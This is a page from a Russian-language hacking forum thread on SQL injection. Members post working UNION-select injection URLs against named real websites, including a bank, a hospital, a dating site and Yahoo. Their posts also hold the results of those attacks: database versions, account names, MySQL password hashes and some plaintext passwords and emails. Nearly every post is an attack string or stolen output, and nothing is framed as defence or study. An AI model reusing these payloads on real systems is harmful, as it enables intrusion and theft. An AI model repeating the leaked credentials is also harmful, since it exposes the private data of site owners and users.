SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.smotri.te.ua/index.php?inc=catalog&under=-6124+union+select+1,concat(nick,0x3a,passwd,0x3a,email),3,4+from+users/*
     
    1 person likes this.
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    vrlknowledgebank.com
    Code:
    http://www.vrlknowledgebank.com/reportinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),13,14,15,16,17,18,19,20,21,22,23+--+&page=3
    4.1.12a-nt-log
    Code:
    http://www.vrlknowledgebank.com/reportinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1+--+&page=3
    Code:
    root:*95949BC5A05704CCF5AD7AE3198DA335047385E9
    admin:131d71e529a05785
     
    2 people like this.
  3. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.futerracom.org/auto.php?inc=team&staff_id=-1+union+select+1,VERSION(),3,4,5,6,7/*
     
  4. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    www.vfs.com
    webmaster@localhost
    vfscom_db
    5.0.22-standard-log

    Reverse-ip - PR
    GAMEDESIGNEXPO.COM - 4
    GEKKOFILMS.COM - none
    MYVFS.COM - none
    THEWEBCAFE.COM - 7
    VANCOUVERFILMSCHOOL.COM - 7
    VFS.COM - 7
    VFSLIVE.COM - none
    VFSTOPGUNS.COM - none
    YOURVFS.COM - none

    www.uselessjunk.com

    users:
    1:rich:tigger
    2:hoover:tigger
    3:jill:tigger
    61:shawing:ilikepie
    21:roninx42:skydog69

    www.bmoca.org

    bd:
    aboutUs
    artists
    contactUs
    education
    events
    reservation
    sessions
    lm_user_groups
    lm_user_list
    orders
    users
    evo_users


    columns:
    username
    password

    users:
    bmoca:bm0c@

    www.igert.neu.edu

    edtech@localhost
    4.1.10a
    igert

    rootpath:/server/ns-home/docs/igert/students/

    mysqluser:
    a.comer:*3918CBD388D14A1CC4408F7F8A633115AC4C808D:dennis

     
    5 people like this.
  5. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    psile.com
    Code:
    http://www.psile.com/index.php?page=catalog_details&CID=-1'+union+select+1,concat(version(),0x3,user(),0x3,database()),3,4,5,6,7,8/*
    Version: 4.1.20
    User: nexus@localhost
    Database: nexus
    Не смог подобрать имена таблиц(
     
    1 person likes this.
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    phparchitecture.com

    Version: 4.0.17
    User: serge@localhost
    Database: serge

    тиблицы не ковырял
     
  7. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    вот
     
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    одна из моих:
     
    1 person likes this.
  9. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    раскрутил))

    PHP:
    http://www.russianfeme.com/russianbrides/bride.htm?l=e&id=6941337+union+select+1,concat_ws(0x3a,name,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,27,28,30,31,32,33,34,35,36,37+from+menprofiles+limit+3,1/*
    http://www.russianfeme.com/russianbrides/bride.htm?l=e&id=6941337+union+select+1,concat_ws(0x3a,name,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,27,28,30,31,32,33,34,35,36,37+from+womenprofiles+limit+3,1/*
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Yahoo.com
    http://www.widgets.yahoo.com/gallery/view.php?widget=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

    рут без пасса =\
     
    2 people like this.
  11. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    4.1.19-log:::db_milim:::db_milim@localhost
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    qwe
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    AOL
    www.devmaster.net
    Разработченги игр
    >8K юзеров. Выводится всё списком, но все записи не выводит, страинца просто не грузистя из-за большого размера
    +)
     
    2 people like this.
  14. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    www.coolrivercafe.com

    ver:4.1.20
    usr:[email protected]
     
  15. 4Dfx

    4Dfx Banned

    Joined:
    6 Dec 2007
    Messages:
    12
    Likes Received:
    10
    Reputations:
    0
    http://www.rch.org.au/dentistry/research.cfm?doc_id=-3601+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_pwd),6+from+users+limit+0,1/*
     
  16. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Citizens Bank of ADA
    citizensada.com
    Code:
      http://citizensada.com/dyn/showpage.php?id=27'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12+--+
    4.1.20:admin@localhost:dyn_citizensada
    Code:
    http://citizensada.com/dyn/showpage.php?id=27'+union+select+1,concat_ws(0x3a,User,password),3,4,5,6,7,8,9,10,11,12+from+mysql.user+limit+1,1+--+
    Code:
    admin:229f047c0c8624dc
    pma_oOWTscKh8rAQ:17141ad54791816d
    horde:74d7af8f330f2189
    greg111667:1c2f7e091b2a6b36
    emailadmin:319a703529b946a8
    thomasrpack:420898473264d01a
    mysqlbackup:319a703529b946a8
    blabla:319a703529b946a9
     
  17. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    www.autosavecomponents.co.uk/shop/
    табла - users
    колонок не вижу
    4.1.22-standard:autosave_store:autosave_goldfis@localhost
     
  18. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    galaxie.com
    Code:
    http://www.galaxie.com/category.php?scid='&category_id=-1+union+select+user,password,3+from+mysql.user/*
    верся:4.1.13a-nt
    пользователь:root@localhost
    база:galaxiecmsphp
    root:67b240e4309aa0de
     
  19. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.monica-companys.com
    Code:
    http://www.monica-companys.com/product.php?id_product=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*
    5.0.22-Debian_0ubuntu6.06-log:monicaco@localhost:monicaco2
    Code:
    http://www.monica-companys.com/product.php?id_product=-1+union+select+1,concat_ws(0x3a,user_id,username,user_password),3+from+phpbb_users+limit+2,1/*
    2:Fraggle:95248cc32e30d7910d048267d7326c81
    3:monica:ff0d813dd5d2f64dd372c6c4b6aed086:monica
     
    #4039 5taY3r, 13 Dec 2007
    Last edited: 13 Dec 2007
  20. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    innovateonline.info
    5.0.24a-community-nt:::innovate:::innovate@localhost

    впадлу дальше смотреть там только через лимит можно ...

    www.uazmadi.ru
    5.0.37-log:avtomoto:avtomoto@localhost

    тут тоже только через лим
     
    #4040 159932, 13 Dec 2007
    Last edited: 13 Dec 2007
Thread Status:
Not open for further replies.